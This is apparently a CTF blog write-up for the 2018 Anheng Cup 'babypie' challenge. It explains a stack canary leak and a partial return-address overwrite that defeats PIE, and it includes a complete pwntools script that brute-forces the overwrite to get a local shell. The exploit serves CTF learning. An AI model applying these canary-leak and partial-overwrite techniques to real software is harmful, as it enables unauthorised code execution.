2018 - 安恒杯 - babypie [stack partial overwrite]

2023-06-08 00:05:03

明顯的是緩沖區溢出呀，read函數可以多讀

2018 - 安恒杯 - babypie [stack partial overwrite]

64位程式，開啟了NX和PIE，且程式裡有了system("/bin/sh")

目标：控制RIP到A3E函數即可~

首先，要處理canary的問題~然後，覆寫傳回位址~

partial overwrite：在開啟了PIE後，無論高位位址如何變化，低位位址是不變的，意味着有機率“撞到”正确的位址

exp如下：

#!/usr/bin/env python
# coding=utf-8

from pwn import *

while True:
    try:
        io = process("./babypie", timeout = 1)
        io.sendafter(":\n", "A" * (0x30 - 0x8 + 1))
        io.recvuntil("A" * (0x30 - 0x8 + 1))
        canary = '\0' + io.recvn(7)
        success("0x" + canary.encode("hex"))
        io.sendafter(":\n", "A" * (0x30 - 0x8) + canary + "B" * 8 + '\x3E\x0A')
        io.interactive()
    except Exception as e:
        io.close()
        print e

參考連結：

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#partial-overwrite

2018 - 安恒杯 - babypie [stack partial overwrite]

繼續閱讀

使用Docker進行Pwn題環境部署使用Docker進行Pwn題環境部署Pwn部署架構國賽Pwn之一

攻防世界PWN之dubblesort題解dubblesort

how2heap（4）：tcache_house_of_spirit 2.31tcache_house_of_spirit 2.31

【pwn基礎】mallopt

PWN學習總結（三）—— BROP

pwn學習總結（五） —— 堆溢出經典題型整理fastbin + 棧溢出fastbin + 函數構造fastbin + 堆執行fastbin + malloc_hook

pwn 暑假複習一

pwn1及ROP總結

pwn之pwn-1001.題目2.思路

（補題）HITCON 2018 PWN baby_tcache超詳細講解前言HITCON 2018 PWN baby_tcache

數組下标越界

PWN學習記錄

WMCTF 2021 pwn Azly複現

how2heap（5）：tcache_poisoning 2.31tcache_poisoning 2.31

【BUUCTF】bjdctf_2020_babystack2

CTF之堆溢出-unlink原理探究